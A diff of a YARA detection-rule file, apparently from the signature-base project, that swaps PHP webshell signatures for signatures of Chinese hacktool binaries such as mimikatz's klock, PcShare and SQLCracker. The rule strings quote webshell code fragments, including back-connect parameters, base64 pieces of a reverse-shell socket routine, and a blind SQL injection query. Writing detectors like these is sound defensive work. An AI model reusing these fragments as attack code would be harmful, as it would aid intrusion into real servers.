-		hash2 = "09609851caa129e40b0d56e90dfc476c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
-		$s2 = "c99sh_sqlquery"
+		$s1 = "Bienvenue dans un processus distant" fullword wide
+		$s2 = "klock.dll" fullword ascii
+		$s3 = "Erreur : le bureau courant (" wide
+		$s4 = "klock de mimikatz pour Windows" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 907KB and all of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Sses_Php_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Dos_Down32 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5139-L5155"
+		description = "Chinese Hacktool Set - file Down32.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e56c254d-1238-5786-8e8a-f9122b0310a9"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L493-L508"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6dbd40e19d4d5753dbd1f7e627bccc08a60430de8138a923f13e836d19dde65c"
+		hash = "0365738acd728021b0ea2967c867f1014fd7dd75"
+		logic_hash = "c1aaaaaaae2ea720d3fc1516d88d678895bcda81344e8c1f4f57e5a20e770123"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"
-		$s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"
+		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
+		$s6 = "down.exe" fullword wide
+		$s15 = "get_Form1" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 137KB and all of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_Marathontool_2 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5156-L5172"
+		description = "Chinese Hacktool Set - file MarathonTool.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "20151673-6779-58ce-872c-81e74a96597d"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L510-L525"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "834c33059e08e8075a8d3f69187b74f3b53afabfc37ae1f13a2f579f0948a363"
+		hash = "75b5d25cdaa6a035981e5a33198fef0117c27c9c"
+		logic_hash = "7581b63a7bddeac93c65b2943b9f5f568464d8f300bc7385ca73880996bd390b"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash4 = "817671e1bdc85e04cc3440bbd9288800"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo sr(15,\"<b>\".$lang[$language.'_text"
-		$s1 = ".$arrow.\"</b>\",in('text','"
+		$s3 = "http://localhost/retomysql/pista.aspx?id_pista=1" fullword wide
+		$s6 = "SELECT ASCII(SUBSTR(username,{0},1)) FROM USER_USERS" fullword wide
+		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php
+rule SIGNATURE_BASE_Scanms_Scanms : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5173-L5188"
+		description = "Chinese Hacktool Set - file scanms.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "50393220-35ae-5d3b-ae3f-5d5eb036c043"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L527-L544"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f97846fdaac949185b4ce6a25cc276f4ae4243d891acb18c3a3ce0c18b540976"
+		hash = "47787dee6ddea2cb44ff27b6a5fd729273cea51a"
+		logic_hash = "d6b33e603953194dab67104cbb9649710515050cf73afb18b2c9083a9e228e6d"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
-		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
-		$s2 = "rst.void.ru"
+		$s1 = "--- ScanMs Tool --- (c) 2003 Internet Security Systems ---" fullword ascii
+		$s2 = "Scans for systems vulnerable to MS03-026 vuln" fullword ascii
+		$s3 = "More accurate for WinXP/Win2k, less accurate for WinNT" fullword ascii
+		$s4 = "added %d.%d.%d.%d-%d.%d.%d.%d" fullword ascii
+		$s5 = "Internet Explorer 1.0" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_CN_Tools_Pcshare : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "7a31b923-15e5-5af4-9ad0-8d261fedf7c4"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5189-L5205"
+		description = "Chinese Hacktool Set - file PcShare.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0c4e9f9b-9839-56a0-be21-a4e9f19cdfdb"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L546-L565"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "764a374c1e4acec8978db1e7e7e326c4fa95c6f92e1ca5a6d7f892bb05ecd289"
+		hash = "ee7ba9784fae413d644cdf5a093bd93b73537652"
+		logic_hash = "57bd1629abe0af1345f505514b99deb4e63ebce7363f3b0abcb76e7201d9b7b7"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "8023394542cddf8aee5dec6072ed02b5"
-		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash3 = "817671e1bdc85e04cc3440bbd9288800"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo ws(2).$lb.\" <a"
-		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"
-		$s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"
+		$s0 = "title=%s%s-%s;id=%s;hwnd=%d;mainhwnd=%d;mainprocess=%d;cmd=%d;" fullword wide
+		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide
+		$s2 = "http://www.pcshares.cn/pcshare200/lostpass.asp" fullword wide
+		$s5 = "port=%s;name=%s;pass=%s;" fullword wide
+		$s16 = "%s\\ini\\*.dat" fullword wide
+		$s17 = "pcinit.exe" fullword wide
+		$s18 = "http://www.pcshare.cn" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and 3 of them
 }
-rule SIGNATURE_BASE__Wacking_Php_Php_1_Specialshell_99_Php_Php_C100_Php
+rule SIGNATURE_BASE_Pw_Inspector : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "3dac5550-598a-5a0f-95c3-2e0162a686ee"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5206-L5222"
+		description = "Chinese Hacktool Set - file pw-inspector.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "888db647-c5d0-5b1b-bcd2-512c1ebeadea"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L567-L582"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d32fc00ba2602a1140dc9030894bb9524c55b95c445a08f2bf6f8fc60108e64"
+		hash = "4f8e3e101098fc3da65ed06117b3cb73c0a66215"
+		logic_hash = "3b54466d80692923b93689a9e43e30dfbc63e5982cb633120795817098d68e05"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash2 = "09609851caa129e40b0d56e90dfc476c"
-		hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(eregi(\"./shbd $por\",$scan))"
-		$s1 = "$_POST['backconnectip']"
-		$s2 = "$_POST['backcconnmsg']"
+		$s1 = "-m MINLEN  minimum length of a valid password" fullword ascii
+		$s2 = "http://www.thc.org" fullword ascii
+		$s3 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 460KB and all of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_R57_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_Dll_Loadex : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "093892f6-ff53-5bd1-b7b2-fea21a9258aa"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5223-L5240"
+		description = "Chinese Hacktool Set - file Dll_LoadEx.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "51235448-751e-51ce-93f8-da48eddb2b7f"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L584-L603"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "afbd2103b0c953d6aec070ba450f43e567560bc9743423a5731cd4d6e5e36bb6"
+		hash = "213d9d0afb22fe723ff570cf69ff8cdb33ada150"
+		logic_hash = "588f4f4d0a2f8f8e76de0a5b1217191c1cace69f934582d4fc3c974fb94b8c3e"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash2 = "8023394542cddf8aee5dec6072ed02b5"
-		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash4 = "817671e1bdc85e04cc3440bbd9288800"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if(rmdir($_POST['mk_name']))"
-		$s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"
-		$s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"
+		$s0 = "WiNrOOt@126.com" fullword wide
+		$s1 = "Dll_LoadEx.EXE" fullword wide
+		$s3 = "You Already Loaded This DLL ! :(" ascii
+		$s10 = "Dll_LoadEx Microsoft " fullword wide
+		$s17 = "Can't Load This Dll ! :(" ascii
+		$s18 = "WiNrOOt" fullword wide
+		$s20 = " Dll_LoadEx(&A)..." fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 120KB and 3 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_Sses_Php_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Dat_Report : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "81480945-b684-50b6-9431-4ab7a786b214"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5241-L5257"
+		description = "Chinese Hacktool Set - file report.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c77633a7-0c2f-5efa-b58b-635546bfec95"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L605-L619"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9bbcb687c83c01ad52e8978a60e604a74f10c33a63af3b91d0286b30dea42890"
+		hash = "4582a7c1d499bb96dad8e9b227e9d5de9becdfc2"
+		logic_hash = "e3b21f37fae388958758af535727844d6e9696862fd9968340e1a619592c53b6"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash3 = "09609851caa129e40b0d56e90dfc476c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"
-		$s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"
-		$s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"
+		$s1 = "<a href=\"http://www.xfocus.net\">X-Scan</a>" fullword ascii
+		$s2 = "REPORT-ANALYSIS-OF-HOST" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 480KB and all of them
 }
-rule SIGNATURE_BASE_Multiple_Php_Webshells
+rule SIGNATURE_BASE_Dos_Iis7 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files multiple_php_webshells"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5259-L5280"
+		description = "Chinese Hacktool Set - file iis7.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8813b7a2-0d44-5f26-80ab-0f493c09a027"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L621-L638"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d55c96febd64107273001edadbda6d0a1b4b00e35fb41b46561b49fca6a9bd1b"
+		hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
+		logic_hash = "e0cbcb63cd2a542e6394792070392d393b2a3485f5a5ef3c6ba0f113ae9270ec"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "be0f67f3e995517d18859ed57b4b4389"
-		hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash4 = "8023394542cddf8aee5dec6072ed02b5"
-		hash5 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash6 = "817671e1bdc85e04cc3440bbd9288800"
-		hash7 = "7101fe72421402029e2629f3aaed6de7"
-		hash8 = "f618f41f7ebeb5e5076986a66593afd1"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
-		$s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0"
-		$s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg"
+		$s0 = "\\\\localhost" fullword ascii
+		$s1 = "iis.run" fullword ascii
+		$s3 = ">Could not connecto %s" fullword ascii
+		$s5 = "WHOAMI" ascii
+		$s13 = "WinSta0\\Default" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php
+rule SIGNATURE_BASE_Switchsniffer : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5281-L5296"
+		description = "Chinese Hacktool Set - file SwitchSniffer.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6019f042-10ab-5899-8b1b-28b2609e9623"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L640-L654"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c089f8175532ddc0e2d256b4972f7db32683bd213a456622ed27ab4844d1e435"
+		hash = "1e7507162154f67dff4417f1f5d18b4ade5cf0cd"
+		logic_hash = "4c75473399a7d47b63c6247248fd2792c675740ac671028b1c0a8ba1a02f35aa"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<b>Dumped! Dump has been writed to "
-		$s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"
-		$s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"
+		$s0 = "NextSecurity.NET" fullword wide
+		$s2 = "SwitchSniffer Setup" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php
+rule SIGNATURE_BASE_Dbexpora : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5297-L5314"
+		description = "Chinese Hacktool Set - file dbexpora.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "43297ce9-60f3-5b69-b7d8-904fffe622fe"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L656-L671"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e82882e89a1aeb256768f2af7a6d3674c89f9abc358710b33b8d3d425defcef1"
+		hash = "b55b007ef091b2f33f7042814614564625a8c79f"
+		logic_hash = "2dad6cedae6a3a446c2c4829516bffa5608ea4d1c13c907796cf4d13ec37965e"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@ini_set(\"highlight" fullword
-		$s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword
-		$s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword
+		$s0 = "SELECT A.USER FROM SYS.USER_USERS A " fullword ascii
+		$s12 = "OCI 8 - OCIDescriptorFree" fullword ascii
+		$s13 = "ORACommand *" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 835KB and all of them
 }
-rule SIGNATURE_BASE__GFS_Web_Shell_Ver_3_1_7___Priv8_Php_Nshell_Php_Php_Gfs_Sh_Php_Php
+rule SIGNATURE_BASE_Sqlcracker : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4d1dd87b-1ffd-564d-9411-c5d2fc01ae0f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5315-L5330"
+		description = "Chinese Hacktool Set - file SQLCracker.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7d7ff2cf-81fb-5a04-a97f-577c306137a9"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L673-L690"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9df5b6df25574b303044a0799c5eb5f38f9ebfbc6f6114275fe1e34adbde1f7c"
+		hash = "1aa5755da1a9b050c4c49fc5c58fa133b8380410"
+		logic_hash = "3724f4b746da413f99880564ae72bc0de867120f1f7eacaf856d42492ebe359e"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "be0f67f3e995517d18859ed57b4b4389"
-		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
-		hash2 = "f618f41f7ebeb5e5076986a66593afd1"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo $uname.\"</font><br><b>\";" fullword
-		$s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
-		$s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"
+		$s0 = "msvbvm60.dll" fullword ascii
+		$s1 = "_CIcos" fullword ascii
+		$s2 = "kernel32.dll" fullword ascii
+		$s3 = "cKmhV" fullword ascii
+		$s4 = "080404B0" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 125KB and all of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Freeversion_Debug : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5331-L5349"
+		description = "Chinese Hacktool Set - file debug.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2d69a39a-0da5-56ca-87a5-9116dea6c950"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L692-L711"
